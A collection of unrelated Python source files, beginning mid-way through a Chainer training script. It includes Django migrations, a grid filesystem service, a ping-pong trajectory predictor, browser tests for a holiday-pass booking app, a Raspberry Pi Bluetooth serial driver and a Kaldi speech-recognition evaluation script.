chainer.serializers.load_npz(model_file_name, model.time_seg_train_chain)
print("only one GPU({0}) updater".format(args.gpu))
updater = chainer.training.StandardUpdater(train_iter, optimizer, device=args.gpu,
converter=lambda batch, device: concat_examples_not_string(batch, device, padding=0))
trainer = training.Trainer(
updater, (args.epoch, 'epoch'), out=args.out)
trainer.extend(
chainer.training.extensions.snapshot_object(optimizer, filename=os.path.basename(pretrained_optimizer_file_name)),
trigger=(args.snapshot, 'epoch'))
trainer.extend(
chainer.training.extensions.snapshot_object(model.time_seg_train_chain,
filename=os.path.basename(model_file_name)),
trigger=(args.snapshot, 'epoch'))
log_interval = 100, 'iteration'
print_interval = 100, 'iteration'
plot_interval = 100, 'iteration'
if args.optimizer != "Adam" and args.optimizer != "AdaDelta":
trainer.extend(chainer.training.extensions.ExponentialShift('lr', 0.1),
trigger=(20, 'epoch'))
elif args.optimizer == "Adam":
trainer.extend(chainer.training.extensions.ExponentialShift("alpha", 0.1, optimizer=optimizer), trigger=(10, 'epoch'))
if args.optimizer != "AdaDelta":
trainer.extend(chainer.training.extensions.observe_lr(),
trigger=log_interval)
trainer.extend(chainer.training.extensions.LogReport(trigger=log_interval,log_name="log_{0}_{1}_{2}_fold_{3}_{4}.log".format(args.faster_backbone,
args.database, args.fold, args.split_idx,
use_paper_classnum)))
trainer.extend(chainer.training.extensions.PrintReport(
['iteration', 'epoch', 'elapsed_time', 'lr',
'main/loss','main/roi_loc_loss',
'main/roi_cls_loss',
'main/rpn_loc_loss',
'main/rpn_cls_loss',
'main/accuracy',
'main/rpn_accuracy',
]), trigger=print_interval)
trainer.extend(chainer.training.extensions.ProgressBar(update_interval=100))
if chainer.training.extensions.PlotReport.available():
trainer.extend(
chainer.training.extensions.PlotReport(
['main/loss'],
file_name='loss_{0}_{1}_fold_{2}_{3}.png'.format(args.database, args.fold, args.split_idx,
use_paper_classnum), trigger=plot_interval
),
trigger=plot_interval
)
trainer.extend(
chainer.training.extensions.PlotReport(
['main/accuracy'],
file_name='accuracy_{0}_{1}_fold_{2}_{3}.png'.format(args.database, args.fold, args.split_idx,
use_paper_classnum), trigger=plot_interval
),
trigger=plot_interval
)
trainer.run()
if __name__ == '__main__':
main()
|
from saga.exceptions import DoesNotExist
from lib.exception.file_exists_exception import FileExistsException
import saga
class FilesystemService:
"""
Service for performing fielsystem operations on GRID.
It's implemented using Saga library.
"""
def __init__(self, file_class=saga.filesystem.File,
dir_class=saga.filesystem.Directory):
"""
Creates a new instance of FilesystemService.
:param file_class: Class for performing operations on remote files.
:param dir_class: Class for performing operations on remote directories.
"""
self._file = file_class
self._dir = dir_class
def copy_and_overwrite(self, sources, dst):
"""
Copies files to destination, which can be either file or directory.
If destination exists, it will be overwritten.
:param sources: List of files to be copied
:param dst: Destination to which files will be copied.
"""
for path in sources:
self._copy_file(path, dst)
def copy(self, sources, dst):
"""
Copies files to destination, which can be either file or directory.
If destination exists, it will raise and exception.
:param sources: List of files to be copied
:param dst: Destination to which files will be copied.
"""
if self._is_directory(dst):
self._copy_to_directory(sources, dst)
else:
self._copy_to_file(sources, dst)
def remove(self, files):
"""
Removes files.
:param files: List of files to be removed.
"""
for path in files:
f = self._file(path)
f.remove(saga.filesystem.RECURSIVE)
def cat_to_file(self, sources, destination):
"""
Concatenates files and writes the result to destination.
:param sources: List of files to concatenate.
:param destination: File to which result will be written.
"""
concat = self._concatenate_sources(sources)
output = self._open_file(destination)
output.write(concat)
output.close()
def cat(self, sources):
"""
Concatenates files and returns the result.
:param source: List of files to concatenate.
"""
return self._concatenate_sources(sources)
def list_dir(self, directory_path):
"""
Lists content of a directory.
:param directory_path: Path to a directory.
"""
content = []
for url in self._dir_content(directory_path):
content.append(url.path)
return content
def _open_file(self, path):
if self._file_exists(path):
return self._file(path)
else:
return self._create_file(path)
def _concatenate_sources(self, sources):
concat = ""
for path in sources:
f = self._file(path)
concat += self._read_file(f)
return concat
def _create_file(self, path):
return self._file(path, flags=saga.filesystem.CREATE)
def _is_directory(self, path):
if self._file_exists(path):
f = self._file(path)
return not f.is_file()
else:
return False
def _copy_to_file(self, sources, dst):
for f in sources:
if self._will_overwrite_file(f, dst):
raise FileExistsException
self._copy_file(f, dst)
def _will_overwrite_file(self, src, dst):
return self._file_exists(dst)
def _copy_to_directory(self, sources, dst):
dst_files = self._dir_content(dst)
for file_path in sources:
if self._file_exists_in_directory(file_path, dst_files):
raise FileExistsException
self._copy_file(file_path, dst)
def _copy_file(self, src, dst):
f = self._file(src)
f.copy(dst)
def _dir_content(self, path):
directory = self._dir(path)
return directory.list()
def _file_name(self, file):
return file.split("/")[-1]
def _file_exists_in_directory(self, file_path, dir_content):
file_name = self._file_name(file_path)
for f in dir_content:
if f.path == file_name:
return True
return False
def _file_exists(self, path):
exists = True
try:
f = self._file(path)
except DoesNotExist:
exists = False
return exists
def _read_file(self, f):
# Workaround for Saga-Python issue #314
content = None
try:
content = f.read()
content = f.read()
except IOError:
content = f.read()
return content
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-16 22:43
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Constellation',
fields=[
('constellationID', models.IntegerField(primary_key=True, serialize=False)),
('constellationName', models.CharField(db_index=True, max_length=100)),
('x', models.FloatField()),
('y', models.FloatField()),
('z', models.FloatField()),
('xMax', models.FloatField()),
('xMin', models.FloatField()),
('yMax', models.FloatField()),
('yMin', models.FloatField()),
('zMax', models.FloatField()),
('zMin', models.FloatField()),
('factionID', models.IntegerField(null=True)),
('radius', models.IntegerField(null=True)),
],
),
migrations.CreateModel(
name='Region',
fields=[
('regionID', models.IntegerField(primary_key=True, serialize=False)),
('regionName', models.CharField(db_index=True, max_length=100)),
('x', models.FloatField()),
('y', models.FloatField()),
('z', models.FloatField()),
('xMax', models.FloatField()),
('xMin', models.FloatField()),
('yMax', models.FloatField()),
('yMin', models.FloatField()),
('zMax', models.FloatField()),
('zMin', models.FloatField()),
('factionID', models.IntegerField(null=True)),
('radius', models.IntegerField(null=True)),
],
),
migrations.AddField(
model_name='constellation',
name='regionID',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='evesde.Region'),
),
]
|
""" Utility program for project ball-ping-pong
This program takes a video of a players playing ping pong (need
not include the players) and predicts the trajectory of the ball,
with only partial frames of the video. The basic idea is to run
optical flow over two adjacent (or close-in-time) frames to estimate
a velocity vector, and compute a curve (parabola for now) based
on the velocity as a function of time.
For usage of this program, run "python3 main.py -h"
args:
video: Path to the video that has a ping pong ball moving.
start: Start time to used for prediction, also adopted as the start of trajectory.
duration: How long the trajectory is in terms of time.
optional args:
delta: An integer such that the delta_t-th frame after the start frame is used
as the second frame of optical flow. Default to 1.
"""
import argparse
from datetime import time
import numpy as np
import cv2
from PIL import Image
import time as ctime
import locate_ball
import VelocityUtils
# gravity in pixel/sec. need tuning for different camera Orz.
#base_ng = 0.0036 # (for rvid)
base_ng = 0.00215 # or 0.0024 (for vid)
#base_ng = 0.0014
def compute_trajectory(p, v, ng, h=0.0):
"""compute poly^2 trajectory from position and velocity
Returns x(t), y(t)
p: position/pose (p_x, p_y)
v: velocity (v_x, v_y) (pixel/frame)
ng: gravity (pixel/frame^2)
"""
xOt = np.polynomial.polynomial.Polynomial((p[0]-(v[0] * h), v[0]))
yOt = np.polynomial.polynomial.Polynomial((p[1]-(v[1] * h)+(h*h*ng/2), v[1]-(2*h*ng/2), ng/2))
return xOt, yOt
def extract_background(vidpath):
cap = cv2.VideoCapture(vidpath)
# Randomly select 25 frames
frameIds = cap.get(cv2.CAP_PROP_FRAME_COUNT) * np.random.uniform(size=25)
# Store selected frames in an array
frames = []
for fid in frameIds:
cap.set(cv2.CAP_PROP_POS_FRAMES, fid)
ret, frame = cap.read()
frames.append(frame)
# Calculate the median along the time axis
medianFrame = np.median(frames, axis=0).astype(dtype=np.uint8)
return medianFrame
if __name__ == '__main__':
cmd_parser = argparse.ArgumentParser()
cmd_parser.add_argument("video", help="path to video of ball movement")
cmd_parser.add_argument("--start", help="time to start drawing the trajectory and used for prediction (in ISO format)", default="00:00:00")
cmd_parser.add_argument("--duration", help="duration of the trajectory to predict (in ISO format)", default="00:00:03")
cmd_parser.add_argument("--delta", type=int, choices=range(1,11), help="frame difference for optical flow", default=1)
args = cmd_parser.parse_args()
# Read background image.
# If not found, preprocess video and
# store it for later.
vidname = args.video[:args.video.rfind('.')]
background = cv2.imread(vidname + "_background.jpg")
if background is None:
background = extract_background(args.video)
cv2.imwrite(vidname + "_background.jpg", background)
cap = cv2.VideoCapture(args.video)
# get info about video
frame_rate = cap.get(cv2.CAP_PROP_FPS)
total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
vid_width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
vid_height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
print(f'frame rate: {frame_rate}')
print(f'total frames: {total_frames}')
print(f'frame size: {int(vid_width)} x {int(vid_height)}')
start, duration = None, None
# addtional processing to validate arguments
try:
start = time.fromisoformat(args.start)
except ValueError:
raise ValueError("argument \"start\" not specified in appropriate format. maybe try ISO format?")
# calculate corresponding frame id at time start
start_sec = start.hour * 3600 + start.minute * 60 + start.second + start.microsecond / 1000000.0
start_frame = int(np.ceil(start_sec / (1.0 / frame_rate)))
# check start in video, else raise error
if start_frame < 0 or start_frame >= total_frames - args.delta:
raise ValueError("start time out of bound")
start_frame += 1
try:
duration = time.fromisoformat(args.duration)
except ValueError:
raise ValueError("argument \"duration\" not specified in appropriate format. maybe try ISO format?")
duration_sec = duration.hour * 3600 + duration.minute * 60 + duration.second + duration.microsecond / 1000000.0
duration_frames = int(np.ceil(duration_sec / (1.0 / frame_rate)))
end_frame = start_frame + duration_frames
# check end_frame is within the video
if end_frame > total_frames:
end_frame = total_frames
# calculate delta frames after start_frame
delta_frame = start_frame + args.delta
print(f'process frame at {start_frame} and {delta_frame}')
print(f'draw trajectory to frame {end_frame}')
# input parsing ends here
# (start_frame, end_frame, delta_frame are frame indices)
# Step 1. play the video until start frame
frame_interval = 1.0 / frame_rate
curr_frame = 0
frame1 = None
while curr_frame < start_frame:
curr_frame += 1
ret, frame1 = cap.read()
cv2.imshow("output", frame1)
k = cv2.waitKey(int(frame_interval * 1000)) & 0xff
if k == 27:
break
assert int(cap.get(cv2.CAP_PROP_POS_FRAMES)) == curr_frame
cv2.imwrite("frame1.jpg", frame1)
cv2.imshow("output", frame1)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Step 2. get initial position(s) of the ball. unit is pixel
filtered_frame = cv2.subtract(frame1, background)
ball_position = locate_ball.locate_ball(frame1, filtered_frame, viz=True)
assert ball_position is not None
print('ball position:', ball_position)
# Create a mask image for drawing purposes
mask = np.zeros_like(frame1)
p0 = np.array([[ball_position]], dtype=np.float32)
old_gray = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
required_frames = [frame1]
while True:
curr_frame += 1
ret, frame = cap.read()
if not ret: # no more frames
print("Video ended.")
break
if curr_frame <= delta_frame:
required_frames.append(frame)
if curr_frame == delta_frame:
assert int(cap.get(cv2.CAP_PROP_POS_FRAMES)) == delta_frame
assert len(required_frames) == args.delta + 1
# now have frames for prediction,
# so draw trajectory before proceeding
frame2 = frame
# frame1 and frame2 are two images for prediction.
# frame1 is the image of start_frame
# and frame2 the image of delta_frame
# MAIN TASK HERE:
# get velocity at start frame. unit is pixel/frame
angles = np.linspace(0, 2*np.pi, num=8, endpoint=False)
dx = 10 * np.cos(angles)
dy = 10 * np.sin(angles)
dx += ball_position[0]
dy += ball_position[1]
track_points = np.stack((dx, dy)).T.tolist()
print(track_points)
#track_points = [ball_position]
if args.delta == 1:
velocity = VelocityUtils.with_LK_optical_flow(frame1, frame2, track_points)
#velocity = VelocityUtils.with_FB_optical_flow(frame1, frame2, track_points)
print(f'velocity = {velocity}')
else:
# try velocities at multiple frame
velocities = VelocityUtils.with_LK_optical_flow_N(required_frames, track_points)
velocity = velocities[0]
# (TEMPORARY) visualize the first velocity
v = np.array(velocity)
v = v * 10 # scale velocity for drawing
c, d = ball_position[0], ball_position[1]
mask = cv2.line(mask, (int(c), int(d)), (int(c+v[0]), int(d+v[1])), (0, 0, 255), 2)
frame1 = cv2.circle(frame1, (int(c), int(d)), 5, (255,255,0), -1)
# compute traj prediction from velocity
if args.delta == 1:
traj_x, traj_y = compute_trajectory(ball_position, velocity, base_ng / frame_interval)
else:
traj_x, traj_y = compute_trajectory(ball_position, velocities[0], base_ng / frame_interval)
pos = np.array(ball_position) + velocities[0]
for i in range(1, len(velocities)):
traj_xi, traj_yi = compute_trajectory(pos, velocities[i], base_ng / frame_interval, h=i)
traj_x += traj_xi
traj_y += traj_yi
pos += velocities[i]
traj_x /= len(velocities)
traj_y /= len(velocities)
traj_interval = end_frame - start_frame + 1
end_x = np.floor(traj_x(traj_interval))
start_x = np.rint(ball_position[0])
if end_x > start_x:
xs = np.arange(start_x, end_x+1)
else:
xs = np.arange(start_x, end_x-1, -1)
ts = (xs - start_x) / velocity[0]
ys = traj_y(ts)
# draw prediction
xs = xs.astype(int)
ys = np.rint(ys).astype(int)
for i in range(1, xs.shape[0]):
mask = cv2.line(mask, (xs[i-1], ys[i-1]), (xs[i], ys[i]), (0,0,255), 2)
img = cv2.add(frame2, mask)
cv2.imshow('output', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
# keep playing video with drawn prediction,
# and also draw ball track
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# optical flow for tracking
p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **(VelocityUtils.lk_params))
good_new = p1[st==1]
good_old = p0[st==1]
old, new = good_old[0], good_new[0]
a,b = new.ravel()
c,d = old.ravel()
mask = cv2.line(mask, (a,b),(c,d), (255,255,255), 2)
frame = cv2.circle(frame, (a,b), 5, (255,255,0), -1)
img = cv2.add(frame, mask)
cv2.imshow('output', img)
k = cv2.waitKey(int(frame_interval * 1000)) & 0xff
if k == 27:
break
# Now update the previous frame and previous points
p0 = good_new.reshape(-1,1,2)
old_gray = frame_gray.copy()
cv2.waitKey(0)
cv2.destroyAllWindows()
|
import time
import json
import pytest
from datetime import timedelta
from psycopg2.extras import NumericRange
from pytest import mark
from sedate import as_datetime, replace_timezone
@mark.flaky(reruns=3)
def test_browse_matching(browser, scenario):
scenario.add_period(title="Ferienpass 2016")
for i in range(2):
scenario.add_activity(title=f"A {i}", state='accepted')
scenario.add_occasion(age=(0, 10), spots=(2, 4))
dustin = scenario.add_attendee(name="Dustin")
mike = scenario.add_attendee(name="Mike")
# the first course has enough attendees
scenario.add_booking(attendee=dustin, occasion=scenario.occasions[0])
scenario.add_booking(attendee=mike, occasion=scenario.occasions[0])
# the second one does not
scenario.add_booking(attendee=mike, occasion=scenario.occasions[1])
scenario.commit()
browser.login_admin()
browser.visit('/matching')
# check the initial state
assert browser.is_text_present("Ferienpass 2016")
assert browser.is_text_present("Zufriedenheit liegt bei 0%")
assert browser.is_text_present("0% aller Durchführungen haben genügend")
assert browser.is_text_present("0 / 4")
# run a matching
browser.find_by_value("Zuteilung ausführen").click()
# check the results
assert browser.is_text_present("Zufriedenheit liegt bei 100%")
assert browser.is_text_present("50% aller Durchführungen haben genügend")
assert browser.is_text_present("1 / 4")
assert browser.is_text_present("2 / 4")
# try to toggle some details
assert not browser.is_text_present("Dustin")
assert not browser.is_text_present("Mike")
browser.find_by_css('.matching-details > button')[0].click()
browser.is_element_visible_by_css('.matches')
assert browser.is_text_present("Dustin")
assert browser.is_text_present("Mike")
# reset it again
browser.find_by_css('.reset-matching').click()
# without this we sometimes get errors
time.sleep(0.25)
# confirm the matching
assert browser.is_text_present("Zufriedenheit liegt bei 0%")
assert browser.is_text_present("0% aller Durchführungen haben genügend")
browser.find_by_css('input[value="yes"]').click()
browser.find_by_css('input[name="sure"]').click()
browser.find_by_value("Zuteilung ausführen").click()
assert browser.is_text_present("wurde bereits bestätigt")
# verify the period's state
browser.visit('/periods')
assert 'finished prebooking' in browser.html
def test_browse_billing(browser, scenario, postgres):
scenario.add_period(title="Ferienpass 2016", confirmed=True)
scenario.add_activity(title="Foobar", state='accepted')
scenario.add_user(username='member@example.org', role='member')
scenario.c.users.by_username('admin@example.org').realname = 'Jane Doe'
scenario.c.users.by_username('member@example.org').realname = 'John Doe'
scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=100)
scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=1000)
scenario.add_attendee(name="Dustin")
scenario.add_booking(
username='admin@example.org',
occasion=scenario.occasions[0],
state='accepted',
cost=100
)
scenario.add_booking(
username='admin@example.org',
occasion=scenario.occasions[1],
state='cancelled',
cost=1000
)
scenario.add_attendee(name="Mike")
scenario.add_booking(
username='member@example.org',
occasion=scenario.occasions[0],
state='accepted',
cost=100
)
scenario.add_booking(
username='member@example.org',
occasion=scenario.occasions[1],
state='accepted',
cost=1000
)
scenario.commit()
browser.login_admin()
# initially there are no bills
browser.visit('/billing')
assert browser.is_text_present("Keine Rechnungen gefunden")
# they can be created
browser.find_by_css("input[type='submit']").click()
assert browser.is_text_present("John Doe")
assert browser.is_text_present("Jane Doe")
# as long as the period is not finalized, there's no way to pay
browser.visit('/billing?username=admin@example.org')
assert browser.is_text_present('100.00 Ausstehend')
browser.visit('/billing?username=member@example.org')
assert browser.is_text_present('1100.00 Ausstehend')
assert 'mark-paid' not in browser.html
# as long as the period is not finalized, there are no invoices
browser.logout()
browser.login('member@example.org', 'hunter2')
browser.visit('/')
assert browser.find_by_css('.invoices-count').first['data-count'] == '0'
browser.visit('/my-bills')
assert browser.is_text_present("noch keine Rechnungen")
browser.logout()
browser.login_admin()
browser.visit('/')
assert browser.find_by_css('.invoices-count').first['data-count'] == '0'
browser.visit('/my-bills')
assert browser.is_text_present("noch keine Rechnungen")
# once the period is finalized, the invoices become public and they
# may be marked as paid
browser.visit('/billing')
browser.find_by_css('input[value="yes"]').click()
browser.find_by_css('input[name="sure"]').click()
browser.find_by_css("input[type='submit']").click()
browser.logout()
browser.login('member@example.org', 'hunter2')
browser.visit('/')
assert browser.find_by_css('.invoices-count').first['data-count'] == '1'
browser.visit('/my-bills')
assert not browser.is_text_present('noch keine Rechnungen')
assert browser.is_text_present("Ferienpass 2016")
browser.logout()
browser.login_admin()
browser.visit('/')
assert browser.find_by_css('.invoices-count').first['data-count'] == '1'
browser.visit('/my-bills')
assert not browser.is_text_present('noch keine Rechnungen')
assert browser.is_text_present("Ferienpass 2016")
browser.visit('/billing?username=member@example.org&state=all')
assert browser.is_text_present('1100.00 Ausstehend')
# we'll test a few scenarios here
postgres.save()
# pay the bill bit by bit
assert not browser.is_element_present_by_css('.paid')
browser.find_by_css('.bill button').click()
browser.find_by_css('table .unpaid .actions-button').first.click()
browser.find_by_css('table .unpaid .mark-paid').first.click()
time.sleep(0.25)
assert browser.is_element_present_by_css('.paid')
assert browser.is_element_present_by_css('.unpaid')
browser.find_by_css('table .unpaid .actions-button').first.click()
browser.find_by_css('table .unpaid .mark-paid').first.click()
time.sleep(0.25)
assert browser.is_element_present_by_css('.paid')
assert not browser.is_element_present_by_css('.unpaid')
# try to introduce a manual booking
postgres.undo()
browser.visit('/billing?state=all')
browser.find_by_css('.dropdown.right-side').click()
browser.find_by_css('.new-booking').click()
browser.choose('target', 'all')
browser.choose('kind', 'discount')
browser.find_by_css('#booking_text').fill('Rabatt')
browser.find_by_css('#discount').fill('1.00')
browser.find_by_value("Absenden").click()
assert browser.is_text_present("2 manuelle Buchungen wurden erstellt")
assert browser.is_element_present_by_css('.remove-manual')
# remove the manual booking
browser.find_by_css('.dropdown.right-side').click()
browser.find_by_css('.remove-manual').click()
assert browser.is_text_present("2 Buchungen entfernen")
browser.find_by_text("2 Buchungen entfernen").click()
time.sleep(0.25)
assert not browser.is_element_present_by_css('.remove-manual')
# The parametrization is used to ensure all the volunteer states can
# be reached by clicking in the browser and verify that the states
# can be exported properly
@pytest.mark.parametrize('to_volunteer_state', [
('Kontaktiert'),
('Bestätigt'),
('Offen'),
])
def test_volunteers_export(browser, scenario, to_volunteer_state):
scenario.add_period(title="Ferienpass 2019", active=True, confirmed=True)
scenario.add_activity(title="Zoo", state='accepted')
scenario.add_user(username='member@example.org', role='member')
scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=100)
scenario.add_need(
name="Begleiter", number=NumericRange(1, 4), accept_signups=True)
scenario.add_attendee(name="Dustin")
scenario.add_booking(
username='admin@example.org',
occasion=scenario.occasions[0],
state='accepted',
cost=100
)
scenario.commit()
scenario.refresh()
# initially, the volunteer feature is disabled
browser.visit('/')
assert not browser.is_text_present('Helfen')
# once activated, it is public
browser.login_admin()
browser.visit('/feriennet-settings')
browser.fill_form({
'volunteers': 'enabled',
'tos_url': 'https://example.org/tos'
})
browser.find_by_value("Absenden").click()
browser.visit('/')
assert browser.is_text_present('Helfen')
# users can sign up as volunteers
browser.links.find_by_text("Helfen").click()
assert browser.is_text_present("Begleiter")
assert not browser.is_element_present_by_css('.volunteer-cart-item')
browser.links.find_by_partial_text("Zu meiner Liste").click()
assert browser.is_element_present_by_css('.volunteer-cart-item')
browser.links.find_by_text("Als Hilfsperson registrieren").click()
browser.fill_form({
'first_name': "Foo",
'last_name': "Bar",
'birth_date': '06.04.1984',
'address': 'Foostreet 1',
'zip_code': '1234',
'place': 'Bartown',
'email': 'foo@bar.org',
'phone': '1234'
})
browser.find_by_value("Absenden").click()
# the volunteer is not in the helpers list yet
browser.visit('/attendees/zoo')
assert not browser.is_text_present("Foo")
# the admin can see the signed-up users
browser.visit(f'/volunteers/{scenario.latest_period.id.hex}')
assert browser.is_text_present("Foo")
# verify initial volunteer state
assert browser.is_text_present("Offen")
browser.find_by_css('.actions-button').first.click()
# move volunteer through different volunteer states
if to_volunteer_state == 'Offen':
pass
elif to_volunteer_state == 'Kontaktiert':
assert not browser.is_text_present("Bestätigt")
browser.links.find_by_partial_text("Als kontaktiert markieren").click()
assert browser.is_text_present("Kontaktiert")
elif to_volunteer_state == 'Bestätigt':
assert not browser.is_text_present("Bestätigt")
browser.links.find_by_partial_text("Als bestätigt markieren").click()
assert browser.is_text_present("Bestätigt")
# now the volunteer is in the list
browser.visit('/attendees/zoo')
assert browser.is_text_present("Foo")
else:
# invalid case
raise AssertionError()
browser.visit('/export/helfer')
browser.fill_form({
'period': scenario.periods[0].id.hex,
'file_format': "json",
})
browser.find_by_value("Absenden").click()
volunteer_export = json.loads(browser.find_by_tag('pre').text)[0]
occasion_date = as_datetime(scenario.date_offset(10))
occasion_date = replace_timezone(occasion_date, 'Europe/Zurich')
start_time = occasion_date.isoformat()
end_time = (occasion_date + timedelta(hours=1)).isoformat()
def get_number_of_confirmed_volunteers(state):
if state == 'Bestätigt':
return 1
return 0
volunteer_json = {
'Angebot Titel': 'Zoo',
'Durchführung Daten': [
[start_time, end_time]
],
'Durchführung Abgesagt': False,
'Bedarf Name': 'Begleiter',
'Bedarf Anzahl': '1 - 3',
'Bestätigte Helfer': get_number_of_confirmed_volunteers(
to_volunteer_state),
'Helfer Status': to_volunteer_state,
'Vorname': 'Foo',
'Nachname': 'Bar',
'Geburtsdatum': '1984-06-04',
'Organisation': '',
'Ort': 'Bartown',
'E-Mail': 'foo@bar.org',
'Telefon': '1234',
'Adresse': 'Foostreet 1'
}
assert volunteer_export == volunteer_json
|
import RPi.GPIO as GPIO
import serial
from time import sleep
import signal
import struct
def sigterm_handler(signal,frame):
GPIO.cleanup()
print("cleaning up gpio from signal handler")
exit(0)
signal.signal(signal.SIGINT, sigterm_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
BLUEFRUIT_MODE_COMMAND = 1
BLUEFRUIT_MODE_DATA = 0
CTS = 4 #23
RTS = 17 #24
mode_pin = 22
GPIO.setmode(GPIO.BCM)
GPIO.setup(CTS, GPIO.OUT)
GPIO.setup(RTS, GPIO.IN)
GPIO.setup(mode_pin, GPIO.OUT)
GPIO.output(mode_pin,GPIO.HIGH)
ser=0
rxText=""
connect=0
mode = BLUEFRUIT_MODE_COMMAND
def reset():
for i in range(5):
isOK = sendCommandCheckOK("ATZ")
if(isOK):
break
if(not isOK):
sleep(.05)
setMode(BLUEFRUIT_MODE_COMMAND)
sleep(.05)
for i in range(5):
isOK = sendCommandCheckOK("ATZ")
if(isOK):
break
if(not isOK):
return False
#Bluefruit need 1 second to reboot
sleep(.001)
flush()
return isOK
def factoryReset():
#return T/F
println("AT+FACTORYRESET")
isOK = waitForOK()
#Bluefruit need 1 second to reboot
sleep(.001)
flush()
return isOK
def waitForOK():
#return T/F
global connect,rxText
counter=0
while(1):
ret = readLine()
if(ret):
ret=ret.split("\n")
if(len(ret)==4):
if(ret[1]=="0\r" or ret[1]=="1\r"):
connect=int(ret[1].rstrip("\r"))
else:
rxText=ret[1].rstrip("\r")
ret=ret[len(ret)-2]+"\n"
counter+=1
if(ret=="OK\r\n"):
return True
if(ret=="ERROR\r\n" or counter == 500):
return False
def isConnected():
#return T/F
return sendCommandWithIntReply("AT+GAPGETCONN")
def disconnect():
sendCommandCheckOK("AT+GAPDISCONNECT")
def sendCommandCheckOK(cmd):
#return T/F
global mode
current_mode = mode;
if(current_mode == BLUEFRUIT_MODE_DATA):
setMode(BLUEFRUIT_MODE_COMMAND)
println(cmd)
result = waitForOK()
if(current_mode == BLUEFRUIT_MODE_DATA):
setMode(BLUEFRUIT_MODE_DATA)
return result
def sendCommandWithIntReply(cmd):
#return T/F or num??
current_mode = mode;
if(current_mode == BLUEFRUIT_MODE_DATA):
setMode(BLUEFRUIT_MODE_COMMAND)
println(cmd)
result = waitForOK()
result = connect;
if(current_mode == BLUEFRUIT_MODE_DATA):
setMode(BLUEFRUIT_MODE_DATA)
return result
def readLine():
c=None
while(available()>0):
try:
c=ser.read(100)
c=c.decode('utf-8')
except UnicodeDecodeError:
c=None
continue
return c
def begin():
global ser, CTS
ser = serial.Serial('/dev/ttyAMA0',9600,timeout=.250,rtscts=1)
GPIO.output(CTS,GPIO.HIGH)
return reset()
def end():
global ser
ser.close()
def setMode(new_mode):
global mode_pin
GPIO.output(mode_pin,new_mode)
sleep(.001)
isOK = True
return isOK
def write(c):
global ser, RTS
while(GPIO.input(RTS)):
sleep(.001)
sleep(50/1000000.0)
ser.write(c.encode('utf-8'))
def available():
global ser
if(ser.inWaiting()<1):
GPIO.output(CTS,GPIO.LOW)
sleep(.001)
GPIO.output(CTS,GPIO.HIGH)
return ser.inWaiting()
def read():
global ser
return ser.read()
def flush():
global ser
ser.flush()
def println(cmd):
for i in cmd:
write(i)
write("\r")
write("\n")
|
import argparse
import time
from pathlib import Path
import numpy as np
import pydng
from datasets import Dataset
from kaldi import Kaldi
from select_models import select_model
BASE_DIR = Path.home().joinpath('dompteur')
def main(models, experiments, dataset_dir, phi, low, high):
# create kaldi instance
model_dir = select_model(models, phi, low, high)
kaldi = Kaldi.from_trained_model(model_dir=model_dir,
base_dir=experiments.joinpath(f'{time.strftime("%Y-%m-%d")}_{pydng.generate_name()}'))
# prepare dataset
dataset = Dataset(dataset_dir)
kaldi_dataset_dir = kaldi.base_dir.joinpath("data", dataset.name)
dataset.dump_as_kaldi_dataset(kaldi_dataset_dir, wavs_prefix=f'data/{dataset.name}')
# decode
wer, meta = kaldi.decode_wavs(data_dir=dataset.data_dir, text=dataset.text)
print(f'\n[+] WER {dataset}: {wer:03.2f}%')
for utt in meta:
print(f"\n[+] {utt['wav_name']}")
print(f" REF: {utt['ref']}")
print(f" HYP: {utt['hyp']}")
print(f" WER: {utt['wer']*100:5.2f}%")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--models', type=Path, default=BASE_DIR.joinpath('models'),
help='Directory with trained models.')
parser.add_argument('--experiments', type=Path, default=BASE_DIR.joinpath('experiments'),
help='Output directory for experiments.')
parser.add_argument('--dataset_dir', type=Path, default=BASE_DIR.joinpath('datasets', 'speech_10'),
help='Path to dataset.')
parser.add_argument('--phi', default="None",
help='Scaling factor for the psychoacoustic filter.')
parser.add_argument('--low', default="None",
help='Lower cut-off frequency of band-pass filter.')
parser.add_argument('--high', default="None",
help='Higher cut-off frequency of band-pass filter.')
Kaldi.build_container(BASE_DIR)
main(**vars(parser.parse_args()))
|
# Generated by Django 3.0.8 on 2020-07-16 14:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('profiles', '0007_guides_quotedcharges'),
]
operations = [
migrations.CreateModel(
name='message',
fields=[
('messagesID', models.AutoField(primary_key=True, serialize=False)),
('content', models.TextField()),
('sendAt', models.DateTimeField(auto_now=True)),
('recipientID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='messageRecipient', related_query_name='messageRecipient', to='profiles.User')),
('senderID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='messageSender', related_query_name='messageSender', to='profiles.User')),
],
),
]
|
import common_vars as c_vars
import pandas as pd
import numpy as np
from datetime import datetime
from scipy import sparse
import pickle
import bisect
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import StandardScaler
from imblearn.over_sampling import SMOTE
from sklearn.feature_selection import chi2
from sklearn.ensemble import RandomForestClassifier
np.random.seed(42)
# 'siteid', 'offerid', 'category', 'merchant', 'countrycode', 'browserid', 'devid'
# df = pd.read_csv(c_vars.train_file)
print(str(datetime.now()) + ' Reading Data')
# df = pd.read_csv(c_vars.train_split_train_sample, nrows = 10000)
df = pd.read_csv(c_vars.train_split_train)
print(str(datetime.now()) + ' Reading Data Complete')
